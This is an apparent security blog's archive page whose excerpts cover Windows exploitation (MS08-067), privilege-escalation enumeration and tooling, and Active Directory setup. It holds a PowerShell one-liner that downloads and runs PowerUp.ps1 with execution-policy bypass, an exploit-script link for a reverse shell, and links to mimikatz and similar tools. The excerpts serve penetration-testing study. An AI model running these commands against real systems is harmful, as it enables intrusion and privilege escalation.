Monthly Archive: October 2019

CLOUD RISKS 0

Cloud Insecurities & defenses

With the advent of new and new technologies, organizations are finding new and creative ways of saving money, value and increasing the profit. In this world of new information systems, cloud computing is coming out as one of...

windows explloit 0

Windows Kernel Exploitation – part 4 | Vulnerabilities

Common Vulnerabilities and Exposure MS08-067 (NetAPI) Check the vulnerability with the following nmap script. nmap -Pn -p445 –open –max-hostgroup 3 –script smb-vuln-ms08-067 <ip_netblock> Metasploit modules to exploit MS08-067 NetAPI. exploit/windows/smb/ms08_067_netapi If you can’t use Metasploit and only want a reverse shell. https://raw.githubusercontent.com/jivoi/pentest/master/exploit_win/ms08-067.py...

windwos 0

Windows privilege escalation – part 3 | Kernal-Exploits

EoP – Kernel Exploitation List of exploits kernel : https://github.com/SecWiki/windows-kernel-exploits #Security Bulletin   #KB     #Description    #Operating System MS17-017  [KB4013081]  [GDI Palette Objects Local Privilege Escalation]  (windows 7/8) CVE-2017-8464  [LNK Remote Code Execution Vulnerability]  (windows 10/8.1/7/2016/2010/2008) CVE-2017-0213  [Windows COM Elevation of Privilege Vulnerability]  (windows 10/8.1/7/2016/2010/2008) CVE-2018-0833 [SMBv3 Null Pointer Dereference Denial...

windows exploit 0

Windows Privilege escalation – Part 2 | Enumeration

Windows Version and Configuration systeminfo | findstr /B /C:”OS Name” /C:”OS Version” Extract patchs and updates wmic qfe Architecture wmic os get osarchitecture || echo %PROCESSOR_ARCHITECTURE% List all env variables set Get-ChildItem Env: | ft Key,Value List all...

0day windows 0

Windows Privilege Escalation Guide – part 1 | Tools

Tools : – https://github.com/fireeye/commando-vm https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite https://github.com/AusJock/Privilege-Escalation/tree/master/Windows https://github.com/fdiskyou/incognito2 https://github.com/PowerShellMafia/PowerSploit https://github.com/gentilkiwi/mimikatz https://github.com/samratashok/nishang https://github.com/SecureAuthCorp/impacket https://www.powershellempire.com/ PowerSploit’s PowerUppowershell -Version 2 -nop -exec bypass IEX (New-Object Net.WebClient).DownloadString(‘https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1’); Invoke-AllChecks Watson – Watson is a (.NET 2.0 compliant) C# implementation of Sherlock (Deprecated) Sherlock –...

0

Active Directory Overview

Active Directory In this article, we are going to learn about active Directory. Various aspects of Active Directory. Our Main Goals of this article are What is Active Directory Why we need Active Directory Active Directory Services Various...

0

Local AD Implementation – 1

Active Directory Implementation Pre-requests: Windows Server 2008 r2 Data Centre (Server OS)  Windows 7 (Enterprise in our case) Step 1:- On Server OS (as administrator) Open Network and Sharing Settings. Then after that go to Properties of the...

0

Local Active Directory Implementation -2

Step 20:- Once you log in to the admin account. Click on Start and then go to Administrative Tools. Then click on Active Directory Users and Computers. Step 21:- Click on cyberdetector.com and then on click on Users....